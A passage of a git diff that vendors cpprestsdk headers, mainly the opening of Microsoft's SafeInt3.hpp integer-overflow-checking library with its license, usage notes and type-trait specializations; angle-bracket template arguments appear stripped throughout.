container_buffer(std::ios_base::openmode mode = std::ios_base::out) + : streambuf( + std::shared_ptr>( + new details::basic_container_buffer<_CollectionType>(mode))) + { + } + + _CollectionType& collection() const + { + auto listBuf = static_cast*>(this->get_base().get()); + return listBuf->collection(); + } +}; + +/// +/// A static class to allow users to create input and out streams based off STL +/// collections. The sole purpose of this class to avoid users from having to know +/// anything about stream buffers. +/// +/// The type of the STL collection. +template +class container_stream +{ +public: + typedef typename _CollectionType::value_type char_type; + typedef container_buffer<_CollectionType> buffer_type; + + /// + /// Creates an input stream given an STL container. + /// + /// STL container to back the input stream. + /// An input stream. + static concurrency::streams::basic_istream open_istream(_CollectionType data) + { + return concurrency::streams::basic_istream(buffer_type(std::move(data), std::ios_base::in)); + } + + /// + /// Creates an output stream using an STL container as the storage. + /// + /// An output stream. + static concurrency::streams::basic_ostream open_ostream() + { + return concurrency::streams::basic_ostream(buffer_type(std::ios_base::out)); + } +}; + +/// +/// The stringstream allows an input stream to be constructed from std::string or std::wstring +/// For output streams the underlying string container could be retrieved using buf->collection(). +/// +typedef container_stream> stringstream; +typedef stringstream::buffer_type stringstreambuf; + +typedef container_stream wstringstream; +typedef wstringstream::buffer_type wstringstreambuf; + +/// +/// The bytestream is a static class that allows an input stream to be constructed from any STL container. +/// +class bytestream +{ +public: + /// + /// Creates a single byte character input stream given an STL container. + /// + /// The type of the STL collection. + /// STL container to back the input stream. + /// An single byte character input stream. + template + static concurrency::streams::istream open_istream(_CollectionType data) + { + return concurrency::streams::istream( + streams::container_buffer<_CollectionType>(std::move(data), std::ios_base::in)); + } + + /// + /// Creates a single byte character output stream using an STL container as storage. + /// + /// The type of the STL collection. + /// A single byte character output stream. + template + static concurrency::streams::ostream open_ostream() + { + return concurrency::streams::ostream(streams::container_buffer<_CollectionType>()); + } +}; + +} // namespace streams +} // namespace Concurrency diff --git a/Src/Common/CppRestSdk/include/cpprest/details/SafeInt3.hpp b/Src/Common/CppRestSdk/include/cpprest/details/SafeInt3.hpp new file mode 100644 index 0000000..0a9dbdd --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/details/SafeInt3.hpp @@ -0,0 +1,7482 @@ +/*----------------------------------------------------------------------------------------------------------- +SafeInt.hpp +Version 3.0.18p + +This software is licensed under the Microsoft Public License (Ms-PL). +For more information about Microsoft open source licenses, refer to +http://www.microsoft.com/opensource/licenses.mspx + +This license governs use of the accompanying software. If you use the software, you accept this license. +If you do not accept the license, do not use the software. + +Definitions +The terms "reproduce," "reproduction," "derivative works," and "distribution" have the same meaning here +as under U.S. copyright law. A "contribution" is the original software, or any additions or changes to +the software. A "contributor" is any person that distributes its contribution under this license. +"Licensed patents" are a contributor's patent claims that read directly on its contribution. + +Grant of Rights +(A) Copyright Grant- Subject to the terms of this license, including the license conditions and limitations +in section 3, each contributor grants you a non-exclusive, worldwide, royalty-free copyright license to +reproduce its contribution, prepare derivative works of its contribution, and distribute its contribution +or any derivative works that you create. + +(B) Patent Grant- Subject to the terms of this license, including the license conditions and limitations in +section 3, each contributor grants you a non-exclusive, worldwide, royalty-free license under its licensed +patents to make, have made, use, sell, offer for sale, import, and/or otherwise dispose of its contribution +in the software or derivative works of the contribution in the software. + +Conditions and Limitations +(A) No Trademark License- This license does not grant you rights to use any contributors' name, logo, + or trademarks. +(B) If you bring a patent claim against any contributor over patents that you claim are infringed by the + software, your patent license from such contributor to the software ends automatically. +(C) If you distribute any portion of the software, you must retain all copyright, patent, trademark, and + attribution notices that are present in the software. +(D) If you distribute any portion of the software in source code form, you may do so only under this license + by including a complete copy of this license with your distribution. If you distribute any portion of the + software in compiled or object code form, you may only do so under a license that complies with this license. +(E) The software is licensed "as-is." You bear the risk of using it. The contributors give no express warranties, + guarantees, or conditions. You may have additional consumer rights under your local laws which this license + cannot change. To the extent permitted under your local laws, the contributors exclude the implied warranties + of merchantability, fitness for a particular purpose and non-infringement. + + +Copyright (c) Microsoft Corporation. All rights reserved. + +This header implements an integer handling class designed to catch +unsafe integer operations + +This header compiles properly at Wall on Visual Studio, -Wall on gcc, and -Weverything on clang. + +Please read the leading comments before using the class. +---------------------------------------------------------------*/ +#pragma once + +// It is a bit tricky to sort out what compiler we are actually using, +// do this once here, and avoid cluttering the code +#define VISUAL_STUDIO_COMPILER 0 +#define CLANG_COMPILER 1 +#define GCC_COMPILER 2 +#define UNKNOWN_COMPILER -1 + +// Clang will sometimes pretend to be Visual Studio +// and does pretend to be gcc. Check it first, as nothing else pretends to be clang +#if defined __clang__ +#define SAFEINT_COMPILER CLANG_COMPILER +#elif defined __GNUC__ +#define SAFEINT_COMPILER GCC_COMPILER +#elif defined _MSC_VER +#define SAFEINT_COMPILER VISUAL_STUDIO_COMPILER +#else +#define SAFEINT_COMPILER UNKNOWN_COMPILER +#endif + +// Enable compiling with /Wall under VC +#if SAFEINT_COMPILER == VISUAL_STUDIO_COMPILER +#pragma warning(push) +// Disable warnings coming from headers +#pragma warning(disable : 4987 4820 4987 4820) + +#endif + +// Need this for ptrdiff_t on some compilers +#include +#include + +#if SAFEINT_COMPILER == VISUAL_STUDIO_COMPILER && defined _M_AMD64 +#include +#define SAFEINT_USE_INTRINSICS 1 +#else +#define SAFEINT_USE_INTRINSICS 0 +#endif + +#if SAFEINT_COMPILER == VISUAL_STUDIO_COMPILER +#pragma warning(pop) +#endif + +// Various things needed for GCC +#if SAFEINT_COMPILER == GCC_COMPILER || SAFEINT_COMPILER == CLANG_COMPILER + +#define NEEDS_INT_DEFINED + +#if !defined NULL +#define NULL 0 +#endif + +// GCC warning suppression +#if SAFEINT_COMPILER == GCC_COMPILER +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wunused-local-typedefs" +#endif + +#include + +// clang only +#if SAFEINT_COMPILER == CLANG_COMPILER + +#if __has_feature(cxx_nullptr) +#define NEEDS_NULLPTR_DEFINED 0 +#endif + +#pragma clang diagnostic push +#pragma clang diagnostic ignored "-Wc++11-long-long" +#pragma clang diagnostic ignored "-Wold-style-cast" +#pragma clang diagnostic ignored "-Wunused-local-typedef" +#endif + +#endif + +// If the user made a choice, respect it #if !defined +#if !defined NEEDS_NULLPTR_DEFINED +// Visual Studio 2010 and higher support this +#if SAFEINT_COMPILER == VISUAL_STUDIO_COMPILER +#if (_MSC_VER < 1600) +#define NEEDS_NULLPTR_DEFINED 1 +#else +#define NEEDS_NULLPTR_DEFINED 0 +#endif +#else +// Let everything else trigger based on whether we use c++11 or above +#if __cplusplus >= 201103L +#define NEEDS_NULLPTR_DEFINED 0 +#else +#define NEEDS_NULLPTR_DEFINED 1 +#endif +#endif +#endif + +#if NEEDS_NULLPTR_DEFINED +#define nullptr NULL +#endif + +#ifndef C_ASSERT +#define C_ASSERT_DEFINED_SAFEINT +#define C_ASSERT(e) typedef char __C_ASSERT__[(e) ? 1 : -1] +#endif + +// Let's test some assumptions +// We're assuming two's complement negative numbers +C_ASSERT(-1 == static_cast(0xffffffff)); + +/************* Compiler Options +***************************************************************************************************** + +SafeInt supports several compile-time options that can change the behavior of the class. + +Compiler options: +SAFEINT_WARN_64BIT_PORTABILITY - this re-enables various warnings that happen when /Wp64 is used. Enabling this +option is not recommended. NEEDS_INT_DEFINED - if your compiler does not support __int8, __int16, +__int32 and __int64, you can enable this. SAFEINT_ASSERT_ON_EXCEPTION - it is often easier to stop on an assert +and figure out a problem than to try and figure out how you landed in the catch block. SafeIntDefaultExceptionHandler - +if you'd like to replace the exception handlers SafeInt provides, define your replacement and define this. Note - two +built in (Windows-specific) options exist: + - SAFEINT_FAILFAST - bypasses all exception handlers, exits the app with an +exception + - SAFEINT_RAISE_EXCEPTION - throws Win32 exceptions, which can be caught +SAFEINT_DISALLOW_UNSIGNED_NEGATION - Invoking the unary negation operator creates warnings, but if you'd like it to +completely fail to compile, define this. ANSI_CONVERSIONS - This changes the class to use default +comparison behavior, which may be unsafe. Enabling this option is not recommended. SAFEINT_DISABLE_BINARY_ASSERT - +binary AND, OR or XOR operations on mixed size types can produce unexpected results. If you do this, the default is to +assert. Set this if you prefer not to assert under these conditions. SIZE_T_CAST_NEEDED - some compilers +complain if there is not a cast to size_t, others complain if there is one. This lets you not have your compiler +complain. SAFEINT_DISABLE_SHIFT_ASSERT - Set this option if you don't want to assert when shifting more bits than +the type has. Enabling this option is not recommended. + +************************************************************************************************************************************/ + +/* +* The SafeInt class is designed to have as low an overhead as possible +* while still ensuring that all integer operations are conducted safely. +* Nearly every operator has been overloaded, with a very few exceptions. +* +* A usability-safety trade-off has been made to help ensure safety. This +* requires that every operation return either a SafeInt or a bool. If we +* allowed an operator to return a base integer type T, then the following +* can happen: +* +* char i = SafeInt(32) * 2 + SafeInt(16) * 4; +* +* The * operators take precedence, get overloaded, return a char, and then +* you have: +* +* char i = (char)64 + (char)64; //overflow! +* +* This situation would mean that safety would depend on usage, which isn't +* acceptable. +* +* One key operator that is missing is an implicit cast to type T. The reason for +* this is that if there is an implicit cast operator, then we end up with +* an ambiguous compile-time precedence. Because of this amiguity, there +* are two methods that are provided: +* +* Casting operators for every native integer type +* Version 3 note - it now compiles correctly for size_t without warnings +* +* SafeInt::Ptr() - returns the address of the internal integer +* Note - the '&' (address of) operator has been overloaded and returns +* the address of the internal integer. +* +* The SafeInt class should be used in any circumstances where ensuring +* integrity of the calculations is more important than performance. See Performance +* Notes below for additional information. +* +* Many of the conditionals will optimize out or be inlined for a release +* build (especially with /Ox), but it does have significantly more overhead, +* especially for signed numbers. If you do not _require_ negative numbers, use +* unsigned integer types - certain types of problems cannot occur, and this class +* performs most efficiently. +* +* Here's an example of when the class should ideally be used - +* +* void* AllocateMemForStructs(int StructSize, int HowMany) +* { +* SafeInt s(StructSize); +* +* s *= HowMany; +* +* return malloc(s); +* +* } +* +* Here's when it should NOT be used: +* +* void foo() +* { +* int i; +* +* for(i = 0; i < 0xffff; i++) +* .... +* } +* +* Error handling - a SafeInt class will throw exceptions if something +* objectionable happens. The exceptions are SafeIntException classes, +* which contain an enum as a code. +* +* Typical usage might be: +* +* bool foo() +* { +* SafeInt s; //note that s == 0 unless set +* +* try{ +* s *= 23; +* .... +* } +* catch(SafeIntException err) +* { +* //handle errors here +* } +* } +* +* Update for 3.0 - the exception class is now a template parameter. +* You can replace the exception class with any exception class you like. This is accomplished by: +* 1) Create a class that has the following interface: +* + template <> class YourSafeIntExceptionHandler < YourException > + { + public: + static __declspec(noreturn) void __stdcall SafeIntOnOverflow() + { + throw YourException( YourSafeIntArithmeticOverflowError ); + } + + static __declspec(noreturn) void __stdcall SafeIntOnDivZero() + { + throw YourException( YourSafeIntDivideByZeroError ); + } + }; +* +* Note that you don't have to throw C++ exceptions, you can throw Win32 exceptions, or do +* anything you like, just don't return from the call back into the code. +* +* 2) Either explicitly declare SafeInts like so: +* SafeInt< int, YourSafeIntExceptionHandler > si; +* or +* #define SafeIntDefaultExceptionHandler YourSafeIntExceptionHandler +* +* Performance: +* +* Due to the highly nested nature of this class, you can expect relatively poor +* performance in unoptimized code. In tests of optimized code vs. correct inline checks +* in native code, this class has been found to take approximately 8% more CPU time (this varies), +* most of which is due to exception handling. Solutions: +* +* 1) Compile optimized code - /Ox is best, /O2 also performs well. Interestingly, /O1 +* (optimize for size) does not work as well. +* 2) If that 8% hit is really a serious problem, walk through the code and inline the +* exact same checks as the class uses. +* 3) Some operations are more difficult than others - avoid using signed integers, and if +* possible keep them all the same size. 64-bit integers are also expensive. Mixing +* different integer sizes and types may prove expensive. Be aware that literals are +* actually ints. For best performance, cast literals to the type desired. +* +* +* Performance update +* The current version of SafeInt uses template specialization to force the compiler to invoke only the +* operator implementation needed for any given pair of types. This will dramatically improve the perf +* of debug builds. +* +* 3.0 update - not only have we maintained the specialization, there were some cases that were overly complex, +* and using some additional cases (e.g. signed __int64 and unsigned __int64) resulted in some simplification. +* Additionally, there was a lot of work done to better optimize the 64-bit multiplication. +* +* Binary Operators +* +* All of the binary operators have certain assumptions built into the class design. +* This is to ensure correctness. Notes on each class of operator follow: +* +* Arithmetic Operators (*,/,+,-,%) +* There are three possible variants: +* SafeInt< T, E > op SafeInt< T, E > +* SafeInt< T, E > op U +* U op SafeInt< T, E > +* +* The SafeInt< T, E > op SafeInt< U, E > variant is explicitly not supported, and if you try to do +* this the compiler with throw the following error: +* +* error C2593: 'operator *' is ambiguous +* +* This is because the arithmetic operators are required to return a SafeInt of some type. +* The compiler cannot know whether you'd prefer to get a type T or a type U returned. If +* you need to do this, you need to extract the value contained within one of the two using +* the casting operator. For example: +* +* SafeInt< T, E > t, result; +* SafeInt< U, E > u; +* +* result = t * (U)u; +* +* Comparison Operators +* Because each of these operators return type bool, mixing SafeInts of differing types is +* allowed. +* +* Shift Operators +* Shift operators always return the type on the left hand side of the operator. Mixed type +* operations are allowed because the return type is always known. +* +* Boolean Operators +* Like comparison operators, these overloads always return type bool, and mixed-type SafeInts +* are allowed. Additionally, specific overloads exist for type bool on both sides of the +* operator. +* +* Binary Operators +* Mixed-type operations are discouraged, however some provision has been made in order to +* enable things like: +* +* SafeInt c = 2; +* +* if(c & 0x02) +* ... +* +* The "0x02" is actually an int, and it needs to work. +* In the case of binary operations on integers smaller than 32-bit, or of mixed type, corner +* cases do exist where you could get unexpected results. In any case where SafeInt returns a different +* result than the underlying operator, it will call assert(). You should examine your code and cast things +* properly so that you are not programming with side effects. +* +* Documented issues: +* +* This header compiles correctly at /W4 using VC++ 8 (Version 14.00.50727.42) and later. +* As of this writing, I believe it will also work for VC 7.1, but not for VC 7.0 or below. +* If you need a version that will work with lower level compilers, try version 1.0.7. None +* of them work with Visual C++ 6, and gcc didn't work very well, either, though this hasn't +* been tried recently. +* +* It is strongly recommended that any code doing integer manipulation be compiled at /W4 +* - there are a number of warnings which pertain to integer manipulation enabled that are +* not enabled at /W3 (default for VC++) +* +* Perf note - postfix operators are slightly more costly than prefix operators. +* Unless you're actually assigning it to something, ++SafeInt is less expensive than SafeInt++ +* +* The comparison operator behavior in this class varies from the ANSI definition, which is +* arguably broken. As an example, consider the following: +* +* unsigned int l = 0xffffffff; +* char c = -1; +* +* if(c == l) +* printf("Why is -1 equal to 4 billion???\n"); +* +* The problem here is that c gets cast to an int, now has a value of 0xffffffff, and then gets +* cast again to an unsigned int, losing the true value. This behavior is despite the fact that +* an __int64 exists, and the following code will yield a different (and intuitively correct) +* answer: +* +* if((__int64)c == (__int64)l)) +* printf("Why is -1 equal to 4 billion???\n"); +* else +* printf("Why doesn't the compiler upcast to 64-bits when needed?\n"); +* +* Note that combinations with smaller integers won't display the problem - if you +* changed "unsigned int" above to "unsigned short", you'd get the right answer. +* +* If you prefer to retain the ANSI standard behavior insert +* #define ANSI_CONVERSIONS +* into your source. Behavior differences occur in the following cases: +* 8, 16, and 32-bit signed int, unsigned 32-bit int +* any signed int, unsigned 64-bit int +* Note - the signed int must be negative to show the problem +* +* +* Revision history: +* +* Oct 12, 2003 - Created +* Author - David LeBlanc - dleblanc@microsoft.com +* +* Oct 27, 2003 - fixed numerous items pointed out by michmarc and bdawson +* Dec 28, 2003 - 1.0 +* added support for mixed-type operations +* thanks to vikramh +* also fixed broken __int64 multiplication section +* added extended support for mixed-type operations where possible +* Jan 28, 2004 - 1.0.1 +* changed WCHAR to wchar_t +* fixed a construct in two mixed-type assignment overloads that was +* not compiling on some compilers +* Also changed name of private method to comply with standards on +* reserved names +* Thanks to Niels Dekker for the input +* Feb 12, 2004 - 1.0.2 +* Minor changes to remove dependency on Windows headers +* Consistently used __int16, __int32 and __int64 to ensure +* portability +* May 10, 2004 - 1.0.3 +* Corrected bug in one case of GreaterThan +* July 22, 2004 - 1.0.4 +* Tightened logic in addition check (saving 2 instructions) +* Pulled error handler out into function to enable user-defined replacement +* Made internal type of SafeIntException an enum (as per Niels' suggestion) +* Added casts for base integer types (as per Scott Meyers' suggestion) +* Updated usage information - see important new perf notes. +* Cleaned up several const issues (more thanks to Niels) +* +* Oct 1, 2004 - 1.0.5 +* Added support for SEH exceptions instead of C++ exceptions - Win32 only +* Made handlers for DIV0 and overflows individually overridable +* Commented out the destructor - major perf gains here +* Added cast operator for type long, since long != __int32 +* Corrected a couple of missing const modifiers +* Fixed broken >= and <= operators for type U op SafeInt< T, E > +* Nov 5, 2004 - 1.0.6 +* Implemented new logic in binary operators to resolve issues with +* implicit casts +* Fixed casting operator because char != signed char +* Defined __int32 as int instead of long +* Removed unsafe SafeInt::Value method +* Re-implemented casting operator as a result of removing Value method +* Dec 1, 2004 - 1.0.7 +* Implemented specialized operators for pointer arithmetic +* Created overloads for cases of U op= SafeInt. What you do with U +* after that may be dangerous. +* Fixed bug in corner case of MixedSizeModulus +* Fixed bug in MixedSizeMultiply and MixedSizeDivision with input of 0 +* Added throw() decorations +* +* Apr 12, 2005 - 2.0 +* Extensive revisions to leverage template specialization. +* April, 2007 Extensive revisions for version 3.0 +* Nov 22, 2009 Forked from MS internal code +* Changes needed to support gcc compiler - many thanks to Niels Dekker +* for determining not just the issues, but also suggesting fixes. +* Also updating some of the header internals to be the same as the upcoming Visual Studio version. +* +* Jan 16, 2010 64-bit gcc has long == __int64, which means that many of the existing 64-bit +* templates are over-specialized. This forces a redefinition of all the 64-bit +* multiplication routines to use pointers instead of references for return +* values. Also, let's use some intrinsics for x64 Microsoft compiler to +* reduce code size, and hopefully improve efficiency. +* +* June 21, 2014 Better support for clang, higher warning levels supported for all 3 primary supported + compilers (Visual Studio, clang, gcc). + Also started to converge the code base such that the public CodePlex version will + be a drop-in replacement for the Visual Studio version. + +* Note about code style - throughout this class, casts will be written using C-style (T), +* not C++ style static_cast< T >. This is because the class is nearly always dealing with integer +* types, and in this case static_cast and a C cast are equivalent. Given the large number of casts, +* the code is a little more readable this way. In the event a cast is needed where static_cast couldn't +* be substituted, we'll use the new templatized cast to make it explicit what the operation is doing. +* +************************************************************************************************************ +* Version 3.0 changes: +* +* 1) The exception type thrown is now replacable, and you can throw your own exception types. This should help +* those using well-developed exception classes. +* 2) The 64-bit multiplication code has had a lot of perf work done, and should be faster than 2.0. +* 3) There is now limited floating point support. You can initialize a SafeInt with a floating point type, +* and you can cast it out (or assign) to a float as well. +* 4) There is now an Align method. I noticed people use this a lot, and rarely check errors, so now you have one. +* +* Another major improvement is the addition of external functions - if you just want to check an operation, this can now +happen: +* All of the following can be invoked without dealing with creating a class, or managing exceptions. This is especially +handy +* for 64-bit porting, since SafeCast compiles away for a 32-bit cast from size_t to unsigned long, but checks it for +64-bit. +* +* inline bool SafeCast( const T From, U& To ) throw() +* inline bool SafeEquals( const T t, const U u ) throw() +* inline bool SafeNotEquals( const T t, const U u ) throw() +* inline bool SafeGreaterThan( const T t, const U u ) throw() +* inline bool SafeGreaterThanEquals( const T t, const U u ) throw() +* inline bool SafeLessThan( const T t, const U u ) throw() +* inline bool SafeLessThanEquals( const T t, const U u ) throw() +* inline bool SafeModulus( const T& t, const U& u, T& result ) throw() +* inline bool SafeMultiply( T t, U u, T& result ) throw() +* inline bool SafeDivide( T t, U u, T& result ) throw() +* inline bool SafeAdd( T t, U u, T& result ) throw() +* inline bool SafeSubtract( T t, U u, T& result ) throw() +* +*/ + +// use these if the compiler does not support _intXX +#ifdef NEEDS_INT_DEFINED +#define __int8 char +#define __int16 short +#define __int32 int +#define __int64 long long +#endif + +namespace msl +{ +namespace safeint3 +{ +// catch these to handle errors +// Currently implemented code values: +// ERROR_ARITHMETIC_OVERFLOW +// EXCEPTION_INT_DIVIDE_BY_ZERO +enum SafeIntError +{ + SafeIntNoError = 0, + SafeIntArithmeticOverflow, + SafeIntDivideByZero +}; + +} // namespace safeint3 +} // namespace msl + +/* + * Error handler classes + * Using classes to deal with exceptions is going to allow the most + * flexibility, and we can mix different error handlers in the same project + * or even the same file. It isn't advisable to do this in the same function + * because a SafeInt< int, MyExceptionHandler > isn't the same thing as + * SafeInt< int, YourExceptionHander >. + * If for some reason you have to translate between the two, cast one of them back to its + * native type. + * + * To use your own exception class with SafeInt, first create your exception class, + * which may look something like the SafeIntException class below. The second step is to + * create a template specialization that implements SafeIntOnOverflow and SafeIntOnDivZero. + * For example: + * + * template <> class SafeIntExceptionHandler < YourExceptionClass > + * { + * static __declspec(noreturn) void __stdcall SafeIntOnOverflow() + * { + * throw YourExceptionClass( EXCEPTION_INT_OVERFLOW ); + * } + * + * static __declspec(noreturn) void __stdcall SafeIntOnDivZero() + * { + * throw YourExceptionClass( EXCEPTION_INT_DIVIDE_BY_ZERO ); + * } + * }; + * + * typedef SafeIntExceptionHandler < YourExceptionClass > YourSafeIntExceptionHandler + * You'd then declare your SafeInt objects like this: + * SafeInt< int, YourSafeIntExceptionHandler > + * + * Unfortunately, there is no such thing as partial template specialization in typedef + * statements, so you have three options if you find this cumbersome: + * + * 1) Create a holder class: + * + * template < typename T > + * class MySafeInt + * { + * public: + * SafeInt< T, MyExceptionClass> si; + * }; + * + * You'd then declare an instance like so: + * MySafeInt< int > i; + * + * You'd lose handy things like initialization - it would have to be initialized as: + * + * i.si = 0; + * + * 2) You could create a typedef for every int type you deal with: + * + * typedef SafeInt< int, MyExceptionClass > MySafeInt; + * typedef SafeInt< char, MyExceptionClass > MySafeChar; + * + * and so on. The second approach is probably more usable, and will just drop into code + * better, which is the original intent of the SafeInt class. + * + * 3) If you're going to consistently use a different class to handle your exceptions, + * you can override the default typedef like so: + * + * #define SafeIntDefaultExceptionHandler YourSafeIntExceptionHandler + * + * Overall, this is probably the best approach. + * */ + +// On the Microsoft compiler, violating a throw() annotation is a silent error. +// Other compilers might turn these into exceptions, and some users may want to not have throw() enabled. +// In addition, some error handlers may not throw C++ exceptions, which makes everything no throw. +#if defined SAFEINT_REMOVE_NOTHROW +#define SAFEINT_NOTHROW +#else +#define SAFEINT_NOTHROW throw() +#endif + +namespace msl +{ +namespace safeint3 +{ +// If you would like to use your own custom assert +// Define SAFEINT_ASSERT +#if !defined SAFEINT_ASSERT +#include +#define SAFEINT_ASSERT(x) assert(x) +#endif + +#if defined SAFEINT_ASSERT_ON_EXCEPTION +inline void SafeIntExceptionAssert() SAFEINT_NOTHROW { SAFEINT_ASSERT(false); } +#else +inline void SafeIntExceptionAssert() SAFEINT_NOTHROW {} +#endif + +#if SAFEINT_COMPILER == GCC_COMPILER || SAFEINT_COMPILER == CLANG_COMPILER +#define SAFEINT_NORETURN __attribute__((noreturn)) +#define SAFEINT_STDCALL +#define SAFEINT_VISIBLE __attribute__((__visibility__("default"))) +#define SAFEINT_WEAK __attribute__((weak)) +#else +#define SAFEINT_NORETURN __declspec(noreturn) +#define SAFEINT_STDCALL __stdcall +#define SAFEINT_VISIBLE +#define SAFEINT_WEAK +#endif + +class SAFEINT_VISIBLE SafeIntException +{ +public: + SafeIntException() SAFEINT_NOTHROW { m_code = SafeIntNoError; } + SafeIntException(SafeIntError code) SAFEINT_NOTHROW { m_code = code; } + SafeIntError m_code; +}; + +namespace SafeIntInternal +{ +// Visual Studio version of SafeInt provides for two possible error +// handlers: +// SafeIntErrorPolicy_SafeIntException - C++ exception, default if not otherwise defined +// SafeIntErrorPolicy_InvalidParameter - Calls fail fast (Windows-specific), bypasses any exception handlers, +// exits the app with a crash +template +class SafeIntExceptionHandler; + +template<> +class SafeIntExceptionHandler +{ +public: + static SAFEINT_NORETURN void SAFEINT_STDCALL SafeIntOnOverflow() + { + SafeIntExceptionAssert(); + throw SafeIntException(SafeIntArithmeticOverflow); + } + + static SAFEINT_NORETURN void SAFEINT_STDCALL SafeIntOnDivZero() + { + SafeIntExceptionAssert(); + throw SafeIntException(SafeIntDivideByZero); + } +}; + +#if !defined _CRT_SECURE_INVALID_PARAMETER +// Calling fail fast is somewhat more robust than calling abort, +// but abort is the closest we can manage without Visual Studio support +// Need the header for abort() +#include +#define _CRT_SECURE_INVALID_PARAMETER(msg) abort() +#endif + +class SafeInt_InvalidParameter +{ +public: + static SAFEINT_NORETURN void SafeIntOnOverflow() SAFEINT_NOTHROW + { + SafeIntExceptionAssert(); + _CRT_SECURE_INVALID_PARAMETER("SafeInt Arithmetic Overflow"); + } + + static SAFEINT_NORETURN void SafeIntOnDivZero() SAFEINT_NOTHROW + { + SafeIntExceptionAssert(); + _CRT_SECURE_INVALID_PARAMETER("SafeInt Divide By Zero"); + } +}; + +#if defined _WINDOWS_ + +class SafeIntWin32ExceptionHandler +{ +public: + static SAFEINT_NORETURN void SAFEINT_STDCALL SafeIntOnOverflow() SAFEINT_NOTHROW + { + SafeIntExceptionAssert(); + RaiseException(static_cast(EXCEPTION_INT_OVERFLOW), EXCEPTION_NONCONTINUABLE, 0, 0); + } + + static SAFEINT_NORETURN void SAFEINT_STDCALL SafeIntOnDivZero() SAFEINT_NOTHROW + { + SafeIntExceptionAssert(); + RaiseException(static_cast(EXCEPTION_INT_DIVIDE_BY_ZERO), EXCEPTION_NONCONTINUABLE, 0, 0); + } +}; + +#endif + +} // namespace SafeIntInternal + +// both of these have cross-platform support +typedef SafeIntInternal::SafeIntExceptionHandler CPlusPlusExceptionHandler; +typedef SafeIntInternal::SafeInt_InvalidParameter InvalidParameterExceptionHandler; + +// This exception handler is no longer recommended, but is left here in order not to break existing users +#if defined _WINDOWS_ +typedef SafeIntInternal::SafeIntWin32ExceptionHandler Win32ExceptionHandler; +#endif + +// For Visual Studio compatibility +#if defined VISUAL_STUDIO_SAFEINT_COMPAT +typedef CPlusPlusExceptionHandler SafeIntErrorPolicy_SafeIntException; +typedef InvalidParameterExceptionHandler SafeIntErrorPolicy_InvalidParameter; +#endif + +// If the user hasn't defined a default exception handler, +// define one now, depending on whether they would like Win32 or C++ exceptions + +// This library will use conditional noexcept soon, but not in this release +// Some users might mix exception handlers, which is not advised, but is supported +#if !defined SafeIntDefaultExceptionHandler +#if defined SAFEINT_RAISE_EXCEPTION +#if !defined _WINDOWS_ +#error Include windows.h in order to use Win32 exceptions +#endif + +#define SafeIntDefaultExceptionHandler Win32ExceptionHandler +#elif defined SAFEINT_FAILFAST +#define SafeIntDefaultExceptionHandler InvalidParameterExceptionHandler +#else +#define SafeIntDefaultExceptionHandler CPlusPlusExceptionHandler +#if !defined SAFEINT_EXCEPTION_HANDLER_CPP +#define SAFEINT_EXCEPTION_HANDLER_CPP 1 +#endif +#endif +#endif + +#if !defined SAFEINT_EXCEPTION_HANDLER_CPP +#define SAFEINT_EXCEPTION_HANDLER_CPP 0 +#endif + +// If an error handler is chosen other than C++ exceptions, such as Win32 exceptions, fail fast, +// or abort, then all methods become no throw. Some teams track throw() annotations closely, +// and the following option provides for this. +#if SAFEINT_EXCEPTION_HANDLER_CPP +#define SAFEINT_CPP_THROW +#else +#define SAFEINT_CPP_THROW SAFEINT_NOTHROW +#endif + +// Turns out we can fool the compiler into not seeing compile-time constants with +// a simple template specialization +template +class CompileConst; +template<> +class CompileConst +{ +public: + static bool Value() SAFEINT_NOTHROW { return true; } +}; +template<> +class CompileConst +{ +public: + static bool Value() SAFEINT_NOTHROW { return false; } +}; + +// The following template magic is because we're now not allowed +// to cast a float to an enum. This means that if we happen to assign +// an enum to a SafeInt of some type, it won't compile, unless we prevent +// isFloat = ( (T)( (float)1.1 ) > (T)1 ) +// from compiling in the case of an enum, which is the point of the specialization +// that follows. + +// If we have support for std, then we can do this easily, and detect enums as well +template +class NumericType; + +#if defined _LIBCPP_TYPE_TRAITS || defined _TYPE_TRAITS_ +// Continue to special case bool +template<> +class NumericType +{ +public: + enum + { + isBool = true, + isFloat = false, + isInt = false + }; +}; +template +class NumericType +{ +public: + enum + { + isBool = false, // We specialized out a bool + isFloat = std::is_floating_point::value, + // If it is an enum, then consider it an int type + // This does allow someone to make a SafeInt from an enum type, which is not recommended, + // but it also allows someone to add an enum value to a SafeInt, which is handy. + isInt = std::is_integral::value || std::is_enum::value + }; +}; + +#else + +template<> +class NumericType +{ +public: + enum + { + isBool = true, + isFloat = false, + isInt = false + }; +}; +template<> +class NumericType +{ +public: + enum + { + isBool = false, + isFloat = false, + isInt = true + }; +}; +template<> +class NumericType +{ +public: + enum + { + isBool = false, + isFloat = false, + isInt = true + }; +}; +template<> +class NumericType +{ +public: + enum + { + isBool = false, + isFloat = false, + isInt = true + }; +}; +template<> +class NumericType +{ +public: + enum + { + isBool = false, + isFloat = false, + isInt = true + }; +}; +template<> +class NumericType +{ +public: + enum + { + isBool = false, + isFloat = false, + isInt = true + }; +}; +#if defined SAFEINT_USE_WCHAR_T || defined _NATIVE_WCHAR_T_DEFINED +template<> +class NumericType +{ +public: + enum + { + isBool = false, + isFloat = false, + isInt = true + }; +}; +#endif +template<> +class NumericType +{ +public: + enum + { + isBool = false, + isFloat = false, + isInt = true + }; +}; +template<> +class NumericType +{ +public: + enum + { + isBool = false, + isFloat = false, + isInt = true + }; +}; +template<> +class NumericType +{ +public: + enum + { + isBool = false, + isFloat = false, + isInt = true + }; +}; +template<> +class NumericType +{ +public: + enum + { + isBool = false, + isFloat = false, + isInt = true + }; +}; +template<> +class NumericType<__int64> +{ +public: + enum + { + isBool = false, + isFloat = false, + isInt = true + }; +}; +template<> +class NumericType +{ +public: + enum + { + isBool = false, + isFloat = false, + isInt = true + }; +}; +template<> +class NumericType +{ +public: + enum + { + isBool = false, + isFloat = true, + isInt = false + }; +}; +template<> +class NumericType +{ +public: + enum + { + isBool = false, + isFloat = true, + isInt = false + }; +}; +template<> +class NumericType +{ +public: + enum + { + isBool = false, + isFloat = true, + isInt = false + }; +}; +// Catch-all for anything not supported +template +class NumericType +{ +public: + // We have some unknown type, which could be an enum. For parity with the code that uses , + // We can try a static_cast - it if compiles, then it might be an enum, and should work. + // If it is something else that just happens to have a constructor that takes an int, and a casting operator, + // then it is possible something will go wrong, and for best results, cast it directly to an int before letting it + // interact with a SafeInt + + enum + { + isBool = false, + isFloat = false, + isInt = 